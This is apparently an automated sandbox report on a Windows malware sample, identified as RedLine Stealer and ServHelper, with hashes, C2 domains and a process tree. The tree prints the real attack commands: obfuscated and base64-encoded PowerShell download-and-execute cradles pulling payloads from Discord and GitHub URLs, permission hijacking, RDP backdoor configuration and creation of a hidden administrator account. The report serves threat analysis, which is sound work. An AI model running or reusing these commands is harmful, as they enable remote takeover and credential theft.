Analysis

  • max time kernel
    128s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    14-08-2021 06:48

General

  • Target

    f618840fdc6d40a683f35a268444ad53.exe

  • Size

    1.0MB

  • MD5

    f618840fdc6d40a683f35a268444ad53

  • SHA1

    259eaba7e8902e26f516f47f25aa35e78496b0d3

  • SHA256

    f60f32ec899bcb92fd50491a8c32f0548afbd4dc02462dfa373d484b4b161a86

  • SHA512

    eaef79404a16724db4eaa4e898d4ae3c575a8bcde0227aad94d0099b49b407676678113375252c085ce447188047a0e5233696d236208f81bf1519b9e4b920e7

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

redline

Botnet

080821

C2

cookiebrokrash.info:80

Extracted

Family

redline

Botnet

2

C2

lllwyerxedo.xyz:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe
    "C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Users\Admin\AppData\Local\Temp\1550642269.exe
      C:\Users\Admin\AppData\Local\Temp\1550642269.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Users\Admin\AppData\Local\Temp\1550642269.exe
        C:\Users\Admin\AppData\Local\Temp\1550642269.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:732
    • C:\Users\Admin\AppData\Local\Temp\1261989323.exe
      C:\Users\Admin\AppData\Local\Temp\1261989323.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:944
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875766613159333928/875767110058532884/geometre.txt
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1696
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            5⤵
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:560
            • C:\Users\Admin\AppData\Local\Temp\clr.exe
              "C:\Users\Admin\AppData\Local\Temp\clr.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:876
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                7⤵
                • Drops file in System32 directory
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:940
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\li0ngda1\li0ngda1.cmdline"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:672
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9656.tmp" "c:\Users\Admin\AppData\Local\Temp\li0ngda1\CSC68A5B573BB724897BDD73A04FCEFF5F.TMP"
                    9⤵
                      PID:912
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1664
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1624
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:960
                  • C:\Windows\system32\takeown.exe
                    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:1156
                  • C:\Windows\system32\icacls.exe
                    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:1332
                  • C:\Windows\system32\icacls.exe
                    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1020
                  • C:\Windows\system32\icacls.exe
                    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:2032
                  • C:\Windows\system32\icacls.exe
                    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:2016
                  • C:\Windows\system32\icacls.exe
                    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:1808
                  • C:\Windows\system32\icacls.exe
                    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:912
                  • C:\Windows\system32\icacls.exe
                    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:428
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                    8⤵
                      PID:1156
                    • C:\Windows\system32\reg.exe
                      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                      8⤵
                      • Modifies registry key
                      PID:2040
                    • C:\Windows\system32\reg.exe
                      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                      8⤵
                        PID:1020
                      • C:\Windows\system32\net.exe
                        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                        8⤵
                          PID:1848
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                            9⤵
                              PID:1508
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                            8⤵
                              PID:2040
                              • C:\Windows\system32\cmd.exe
                                cmd /c net start rdpdr
                                9⤵
                                  PID:1716
                                  • C:\Windows\system32\net.exe
                                    net start rdpdr
                                    10⤵
                                      PID:2016
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 start rdpdr
                                        11⤵
                                          PID:1020
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                    8⤵
                                      PID:1544
                                      • C:\Windows\system32\cmd.exe
                                        cmd /c net start TermService
                                        9⤵
                                          PID:1156
                                          • C:\Windows\system32\net.exe
                                            net start TermService
                                            10⤵
                                              PID:2032
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 start TermService
                                                11⤵
                                                  PID:1116
                                          • C:\Windows\system32\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                            8⤵
                                              PID:2968
                                            • C:\Windows\system32\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                              8⤵
                                                PID:2980
                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.binance.com/en/register?ref=WDA8929C
                                    2⤵
                                    • Modifies Internet Explorer settings
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SetWindowsHookEx
                                    • Suspicious use of WriteProcessMemory
                                    PID:1688
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1688 CREDAT:275457 /prefetch:2
                                      3⤵
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:268
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe & exit
                                    2⤵
                                    • Deletes itself
                                    • Suspicious use of WriteProcessMemory
                                    PID:1624
                                    • C:\Windows\SysWOW64\PING.EXE
                                      ping 0
                                      3⤵
                                      • Runs ping.exe
                                      PID:1328
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe user WgaUtilAcc 000000 /del
                                  1⤵
                                    PID:1808
                                    • C:\Windows\system32\net.exe
                                      net.exe user WgaUtilAcc 000000 /del
                                      2⤵
                                        PID:2072
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                                          3⤵
                                            PID:2084
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe user WgaUtilAcc bgcKKZ66 /add
                                        1⤵
                                          PID:2096
                                          • C:\Windows\system32\net.exe
                                            net.exe user WgaUtilAcc bgcKKZ66 /add
                                            2⤵
                                              PID:2120
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user WgaUtilAcc bgcKKZ66 /add
                                                3⤵
                                                  PID:2132
                                            • C:\Windows\System32\cmd.exe
                                              cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                              1⤵
                                                PID:2160
                                                • C:\Windows\system32\net.exe
                                                  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                  2⤵
                                                    PID:2184
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                      3⤵
                                                        PID:2196
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
                                                    1⤵
                                                      PID:2224
                                                      • C:\Windows\system32\net.exe
                                                        net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
                                                        2⤵
                                                          PID:2248
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
                                                            3⤵
                                                              PID:2260
                                                        • C:\Windows\System32\cmd.exe
                                                          cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                          1⤵
                                                            PID:2284
                                                            • C:\Windows\system32\net.exe
                                                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                              2⤵
                                                                PID:2308
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                  3⤵
                                                                    PID:2320
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd /C net.exe user WgaUtilAcc bgcKKZ66
                                                                1⤵
                                                                  PID:2352
                                                                  • C:\Windows\system32\net.exe
                                                                    net.exe user WgaUtilAcc bgcKKZ66
                                                                    2⤵
                                                                      PID:2376
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 user WgaUtilAcc bgcKKZ66
                                                                        3⤵
                                                                          PID:2388
                                                                    • C:\Windows\System32\cmd.exe
                                                                      cmd.exe /C wmic path win32_VideoController get name
                                                                      1⤵
                                                                        PID:2420
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic path win32_VideoController get name
                                                                          2⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2456
                                                                      • C:\Windows\System32\cmd.exe
                                                                        cmd.exe /C wmic CPU get NAME
                                                                        1⤵
                                                                          PID:2504
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic CPU get NAME
                                                                            2⤵
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2528
                                                                        • C:\Windows\System32\cmd.exe
                                                                          cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                          1⤵
                                                                            PID:2568
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                              2⤵
                                                                                PID:2592
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                  3⤵
                                                                                  • Blocklisted process makes network request
                                                                                  • Drops file in Windows directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2604
                                                                            • C:\Windows\System32\cmd.exe
                                                                              cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
                                                                              1⤵
                                                                                PID:2824
                                                                                • C:\Windows\system32\net.exe
                                                                                  net user wgautilacc 111213
                                                                                  2⤵
                                                                                    PID:2848
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user wgautilacc 111213
                                                                                      3⤵
                                                                                        PID:2860
                                                                                    • C:\Windows\system32\net.exe
                                                                                      net user wgautilacc /active:yes
                                                                                      2⤵
                                                                                        PID:2884
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 user wgautilacc /active:yes
                                                                                          3⤵
                                                                                            PID:2896

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v6

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • memory/560-108-0x0000000001010000-0x0000000001011000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/560-104-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                        Filesize

                                                                                        120KB

                                                                                      • memory/560-106-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                        Filesize

                                                                                        120KB

                                                                                      • memory/732-71-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                        Filesize

                                                                                        120KB

                                                                                      • memory/732-74-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                        Filesize

                                                                                        120KB

                                                                                      • memory/732-83-0x0000000004E00000-0x0000000004E01000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/876-113-0x00000000412C0000-0x00000000416E0000-memory.dmp

                                                                                        Filesize

                                                                                        4.1MB

                                                                                      • memory/876-116-0x0000000040E24000-0x0000000040E26000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/876-118-0x0000000040E27000-0x0000000040E28000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/876-117-0x0000000040E26000-0x0000000040E27000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/876-115-0x0000000040E22000-0x0000000040E24000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/940-142-0x00000000025E0000-0x00000000025E1000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/940-124-0x0000000002380000-0x0000000002381000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/940-127-0x0000000002500000-0x0000000002501000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/940-138-0x0000000002470000-0x0000000002471000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/940-125-0x000000001AA90000-0x000000001AA92000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/940-140-0x000000001B7C0000-0x000000001B7C1000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/940-141-0x000000001B840000-0x000000001B841000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/940-126-0x000000001AA94000-0x000000001AA96000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/940-130-0x000000001B560000-0x000000001B561000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/940-157-0x000000001AA9A000-0x000000001AAB9000-memory.dmp

                                                                                        Filesize

                                                                                        124KB

                                                                                      • memory/940-123-0x000000001AB10000-0x000000001AB11000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/940-122-0x0000000002430000-0x0000000002431000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/944-80-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/944-84-0x000000001B2F0000-0x000000001B2F2000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/944-86-0x00000000003D0000-0x00000000003D1000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/960-206-0x000000001ABD4000-0x000000001ABD6000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/960-205-0x000000001ABD0000-0x000000001ABD2000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/1624-185-0x000000001AC14000-0x000000001AC16000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/1624-184-0x000000001AC10000-0x000000001AC12000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/1652-60-0x0000000075561000-0x0000000075563000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/1664-155-0x000000001A950000-0x000000001A951000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1664-176-0x000000001B5A0000-0x000000001B5A1000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1664-163-0x000000001B640000-0x000000001B641000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1664-156-0x00000000025A0000-0x00000000025A1000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1664-153-0x0000000002630000-0x0000000002631000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1664-151-0x0000000002440000-0x0000000002441000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1664-177-0x000000001B5B0000-0x000000001B5B1000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1664-149-0x000000001AC74000-0x000000001AC76000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/1664-148-0x000000001AC70000-0x000000001AC72000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/1688-87-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/1696-98-0x000000001ABC4000-0x000000001ABC6000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/1696-65-0x0000000001050000-0x0000000001051000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1696-102-0x000000001AB00000-0x000000001AB01000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1696-101-0x000000001B750000-0x000000001B751000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1696-99-0x0000000002670000-0x0000000002671000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1696-69-0x00000000009F0000-0x0000000000A11000-memory.dmp

                                                                                        Filesize

                                                                                        132KB

                                                                                      • memory/1696-68-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1696-94-0x00000000023E0000-0x00000000023E1000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1696-97-0x000000001ABC0000-0x000000001ABC2000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/1696-96-0x0000000002640000-0x0000000002641000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1696-95-0x000000001AC40000-0x000000001AC41000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1696-103-0x0000000002740000-0x000000000274E000-memory.dmp

                                                                                        Filesize

                                                                                        56KB

                                                                                      • memory/2604-266-0x0000000019310000-0x0000000019312000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/2604-267-0x0000000019314000-0x0000000019316000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/2604-298-0x000000001931A000-0x0000000019339000-memory.dmp

                                                                                        Filesize

                                                                                        124KB